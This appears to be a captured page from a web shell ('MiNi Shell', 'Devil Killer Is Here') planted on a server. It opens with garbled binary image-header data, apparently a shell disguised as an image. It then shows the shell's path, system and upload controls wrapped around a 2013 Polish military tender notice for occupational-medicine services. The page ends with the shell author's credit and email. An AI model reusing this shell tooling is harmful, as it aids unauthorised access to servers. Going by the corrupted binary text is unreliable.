JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131216/273119-N-2013.html

<p class="kh_header"><b>Mińsk Mazowiecki: USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY DLA PRACOWNIKÓW WOJSKA I ŻOŁNIERZY ZAWODOWYCH JW. 1131 ORAZ JEDNOSTEK ORGANIZACYJNYCH BĘDĄCYCH NA JEJ ZAOPATRZENIU SPRAWA ZP/50/2013</b><br>
<b>Numer ogłoszenia: 273119 - 2013; data zamieszczenia: 16.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1131 , 05-300 Mińsk Mazowiecki, woj. mazowieckie, tel. 25 74 74 510, faks 25 74 74 520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.23blt.sp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: WOJSKO.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY DLA PRACOWNIKÓW WOJSKA I ŻOŁNIERZY ZAWODOWYCH JW. 1131 ORAZ JEDNOSTEK ORGANIZACYJNYCH BĘDĄCYCH NA JEJ ZAOPATRZENIU SPRAWA ZP/50/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy dla pracowników wojska i żołnierzy zawodowych JW 1131 oraz jednostek organizacyjnych będących na jej zaopatrzeniu polegające na:  
Usługi medyczne w zakresie  badań profilaktycznych:
-  Wykonawca powinien zapewnić:  dostępność usług t.j. wykonywania wszystkich badań diagnostycznych oraz konsultacji specjalistycznych zleconych przez Zamawiającego wymaganych w zakresie medycyny pracy oraz do celów dyspensaryzacji  w jednym obiekcie (budynku);
 - Konsultacje specjalistyczne zlecone przez Zamawiającego ( wyznaczonego lekarza med. pracy zatrudnionego w J.W. 1131) oraz wyniki badań obrazowych, czynnościowych powinny być wykonane i  do odbioru przez badanego, w dniu  badania. Za wykonane badania dodatkowe których nie zlecił lekarz med. pracy J.W. 1131 Zleceniodawca nie będzie ponosił kosztów finansowych; 
- Pomieszczenia ZOZ-u, w których przyjmowane będą osoby kierowane przez lekarzy zamawiającego muszą spełniać kryteria stawiane przez właściwą stację sanitarno-epidemiologiczną lub Wojskowy Ośrodek Medycyny Prewencyjnej (certyfikat sanepid-u) oraz być dostępne dla pacjentów we wszystkie dni robocze w godz. 8.00-14.00; 
- Wykonawca powinien zapewnić pełną bezpłatną dostępność do węzłów sanitarnych oraz szatni.
- Konsultanci - lekarze specjaliści powinni być dostępni co najmniej w godzinach 8.00 - 13.00 i legitymować się dyplomem specjalizacji 1-go i 2-go stopnia lub podspecjalnością w zakresie dziedzin, w których udzielają konsultacji na rzecz zamawiającego, oraz posiadać prawo wykonywania zawodu lekarza na terenie RP; 
-  Pracownie badań czynnościowych i obrazowych powinny być dostępne co najmniej w godzinach 8.00 - 13.00; 
- Oczekiwanie na przyjęcie w gabinecie lekarskim, pracowni badań czynnościowych 
i obrazowych osób kierowanych przez lekarzy medycyny pracy zamawiającego, nie powinno trwać dłużej niż 1 godzinę; 
- Lekarze - konsultanci muszą znać przepisy zawarte w Rozporządzeniu Ministra Zdrowia
 i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich żołnierzy i pracowników wojska, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz.U. z 1996 r. nr 69 poz. 332, z późniejszymi zmianami), Ustawę z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 1997 r. nr 96, poz. 593, z późniejszymi zmianami) oraz (Dz. U. z 2010r. nr 187, poz.1257 z późniejszymi zmianami); 
 - Konsultacja lekarska polega na badaniu podmiotowym, przedmiotowym, ocenie wyników badań dodatkowych oraz dokumentacji medycznej, dostarczonej przez osobę kierowaną;
 - Lekarz - konsultant dokonuje właściwego wpisu na odwrocie druku skierowania na badania profilaktyczne,  które następnie będzie podstawą do oceny i wydania orzeczenia o zdolności do pracy dla lekarza medycyny pracy zatrudnionego w jednostce wojskowej;
- Konieczne jest wpisanie przez lekarza konsultanta rozpoznania ( określenia stanu zdrowia co do braku lub występowania braku przeciwwskazań do pracy na danym stanowisku) a w przypadku konsultacji oznaczonej jako konsultacji do celów dyspanseryzacji z podaniem rozpoznania jednostki chorobowej oraz zaleceń dla pacjenta które będą odnotowane w karcie dyspensaryzacji w jednostce wojskowej i realizowane  w ramach POZ; 
- Konsultacja specjalistyczna opatrzona musi być podpisem właściwego lekarza oraz pieczątką osobistą (w przypadku braku któregokolwiek z powyższych elementów konsultacja uważana będzie za nie odbytą). Zamawiający przedstawi listę lekarzy uprawnionych do kierowania do placówki służby zdrowia ( wszelkie zmiany będą pisemnie zgłaszane do placówki służby zdrowia);
- W przypadku nieobecności lekarza zakładowego JW1131 z przyczyn służbowych ( poligony, misje itp), urlopu czy z przyczyn zdrowotnych całość badań profilaktycznych włącznie z orzeczeniem końcowym o zdolności do pracy pracowników JW. 1131 i jednostek będących na ich zabezpieczeniu wykona placówka zdrowia wyłoniona z przetargu. W przypadku wystąpienia wyżej wymienionej sytuacji Zleceniobiorca będzie powiadomiony z tygodniowym wyprzedzeniem. Wykaz placówek uprawnionych do wysyłania na badania pracowników na badania pracownicze otrzyma Zleceniobiorca za pomocą maila lub faksu po wcześniejszym uzgodnieniu drogą telefoniczną. Badania zlecone przez lekarza med. pracy Zleceniobiorcy do celów wydania ostatecznego orzeczenia pracownikom Zleceniodawcy nie będą wykraczały poza badania niezbędne wynikające z czynników szkodliwych i zagrożeń określonych w skierowaniu na badania i określonych w Dz.U. z 1997r. nr 96. Lekarz med. pracy Zleceniobiorcy nie będzie zlecał badań dodatkowych do celów dyspanseryzacji (t.j. kontrolnych związanych z monitorowaniem stanu zdrowia w schorzeniach przewlekłych) żołnierzy zawodowych. 
- Wykonawca jest zobowiązany do przedstawiania zamawiającemu co miesiąc do 10 dnia następnego miesiąca faktur VAT z załącznikami obejmującymi imię, nazwisko, PESEL, datę badania osoby badanej oraz dane personalne  lekarza- konsultanta z określeniem jakiej konsultacji udzielił/jakie badanie  zostało wykonane;
Usługi medyczne w zakresie badań laboratoryjnych: 
- Wykonawca zapewni: dostępność usług t.j. pobierania materiału biologicznego w punkcie pobrań;
- Pobieranie materiału biologicznego oraz wykonanie badań analitycznych będzie   wykonywane  przez osoby o odpowiednich kwalifikacjach;
- Wykonawca gwarantuje, że pomieszczenia ZOZ-u, w których przyjmowane będą osoby kierowane przez lekarzy zamawiającego spełniają kryteria stawiane przez właściwą stację sanitarno-epidemiologiczną lub Wojskowy Ośrodek Medycyny Prewencyjnej (certyfikat sanepid-u) oraz będą dostępne dla pacjentów we wszystkie dni robocze w godz. 7.30 - 10.30; 
- Zapewni bezpłatną dostępność do szatni; 
- Wyniki badań laboratoryjnych podstawowych ( morfologia, OB, glukoza w surowicy, profil lipidowy, AspAt, AlAt, bilirubina całkowita, badanie ogólne moczu)  będą do odbioru przez badanego, w ciągu 2 dni od badania.  
- Oczekiwanie na przyjęcie w laboratorium osób kierowanych przez lekarzy medycyny pracy zamawiającego, nie będzie trwało dłużej niż 30 min.
3.	Wykonawca powinien dysponować placówką położoną nie dalej niż 60 km od siedziby zamawiającego ( tj. od JW 1131, 05-300 Mińsk Mazowiecki);
4.	Zamówienie nie  jest podzielone na części;
5.	Zakres przedmiotowy usługi zawiera załącznik nr 2 - formularz cenowy;
6.	 Ilości badań przedstawione w załączniku nr 2 mają charakter poglądowy i zostały przedstawione w celu przedstawienia potencjalnym Wykonawcom szacunkowej wielkości zamówienia, porównania złożonych w postępowaniu ofert oraz dokonania wyboru oferty najkorzystniejszej. Rzeczywiste ilości badań i konsultacji, które będą wykonywane w przebiegu realizacji umowy będą zależeć od potrzeb zamawiającego i mogą się różnić od ilości przedstawionych w załączniku nr 2. Wielkość przedmiotu umowy ograniczona będzie środkami, jakie zamawiający przeznaczył na sfinansowanie zamówienia.
7.	Zamawiający zastrzega sobie możliwość zmiany ( zmniejszenia) liczby osób kierowanych na badania w trakcie obowiązywania umowy. Zmiana liczny osób może wynikać ze zmiany struktury zatrudnienia i zmian organizacyjnych, czego nie można było przewidzieć przed podpisaniem umowy. Cena jednostkowa oraz pozostałe warunki umowy pozostaną bez zmian.
8.	Zamawiający zastrzega sobie prawo do zmian ilościowych poszczególnych rodzajów usług medycznych. Poszczególne rodzaje usług medycznych są ilościami szacunkowymi i mogą ulec zmniejszeniu lub zwiększeniu , nie przekraczając jednak łącznej kwoty umowy.
9.	Wykonawca zobowiązuje się do prowadzenia dokumentacji realizowanych usług medycznych i przekazywania Zamawiającemu wykazu zawierającego imię, nazwisko, nr PESEL, nr JW, stanowisko badanego, nazwisko lekarza kierującego, rodzajem przeprowadzonego badania, datą badania oraz ceną badania  wraz z fakturą;
10.	Wykonawca zobowiązuje się do zapewnienia wykonywania badań na najwyższym poziomie zarówno pod względem obsługi ze strony personelu medycznego, jak i warunków lokalowych oraz świadczenia usług medycznych nieprzerwanie przez cały okres trwania umowy ( bez przerw urlopowych, chorobowych itp.).
11.	Wyniki badań laboratoryjnych i diagnostycznych przekazywane będą przez kuriera lub listem poleconym na adres Izby  Chorych JW. 1131 raz w tygodniu.
Zgodnie z formularzem cenowym -załącznik nr 2 SIWZ zamieszczonej na stronie zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawcy okażą decyzję o wpisie do rejestru zakładów opieki zdrowotnej, prowadzonego przez wojewodę lub ministra właściwego do spraw zdrowia, lub odpisem z takiego rejestru, wystawionym nie wcześniej niż 6 miesięcy przed terminem składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają Wykonawcy, którzy wykonali lub wykonują należycie co najmniej dwie usługi główne polegające na świadczeniu usług medycznych z zakresu medycyny pracy   w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie, za kwotę minimum 100 000,00 zł brutto każda.
(zał. nr 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia złożonego przez Wykonawcę (zgodnego z zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia złożonego przez Wykonawcę (zgodnego z zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia złożonego przez Wykonawcę (zgodnego z zał. nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.23blt.sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA 1131
05-300 MIŃSK MAZOWIECKI.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2013 godzina 10:00, miejsce: Ofertę należy złożyć w Jednostce Wojskowej 1131, 05-300 Mińsk Mazowiecki; (kancelaria jawna)  w dni robocze w godzinach 7:30 - 15:30 nie później niż do dnia 30.12.2013 godz. 10.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com